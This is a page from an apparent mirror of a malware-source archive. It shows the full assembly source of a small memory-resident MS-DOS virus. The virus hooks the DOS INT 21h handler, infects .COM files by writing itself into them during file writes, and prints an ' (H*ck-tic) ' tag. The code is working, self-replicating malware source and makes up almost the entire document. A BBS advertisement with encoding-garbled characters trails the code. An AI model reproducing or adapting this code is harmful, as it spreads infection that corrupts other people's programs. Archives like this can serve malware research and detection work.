ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2025-01-22 10:08:51 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
main
MalwareSourceCode/MSDOS/H-Index/Virus.MSDOS.Unknown.hack-res.asm
vxunderground 4b9382ddbc re-organize 
push
2022-08-21 04:07:57 -05:00

84 lines
3.0 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
len equ offset int21-100h ;LENGTH OF VIRUS CODE
;
start: mov ax,9000h ;MOVE VIRUS CODE UP
mov es,ax
mov di,si
mov cx,len
rep movsb
mov ds,cx ;DS = 0
mov si,84h ;INT 21 VECTOR
mov di,offset int21
push di
mov dx,offset infect
lodsw ;SAVE ORIGINAL VECTOR
cmp ax,dx ;VIRUS PROBABLY ALREADY RESIDENT
je exit
stosw
lodsw
stosw
push es
pop ds
mov ax,2521h ;REVECTOR TO VIRUS
int 21h
exit: push cs ;RESTORE SEGMENT REGISTERS
pop ds
push cs
pop es
pop si ;SI = END OF VIRUS CODE
mov di,0fch
push di ;RETURN HERE
mov ax,0aaach ;LODSB/STOSB INSTRUCTIONS
stosw
mov ax,0fce2h ;LOOP TO ADDRESS INSTRUCTIONS
stosw
mov ch,0feh
ret ;MOVE CODE AND RUN PROGRAM
;
infect: pushf
push ax
push cx
push dx
push si
push ds
cmp ah,40h ;WRITE FUNC?
jne done
cmp bx,1
je mes
mov si,dx ;DS:DX = WRITE BUFFER
lodsb
cmp al,0b8h ;ALREADY INFECTED?
je done
cmp al,0ebh ;PROBABLY .COM
jne done
mov cx,len ;LENGTH OF VIRUS
mov dh,1 ;DX ASSUMED TO BE 0
hack: push cs
pop ds
pushf
call cs:[int21] ;WRITE VIRUS
done: pop ds
pop si
pop dx
pop cx
pop ax
popf ;CONTINUE INTERRUPT
jmp cs:[int21]
mes: mov cx,12
mov dx,offset string
jmp short hack
string db ' (H*ck-tic) '
;
int21 dd 0c3h ;STANDALONE VIRUS RETURNS
tic ends
end start

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
Reference in New Issue View Git Blame Copy Permalink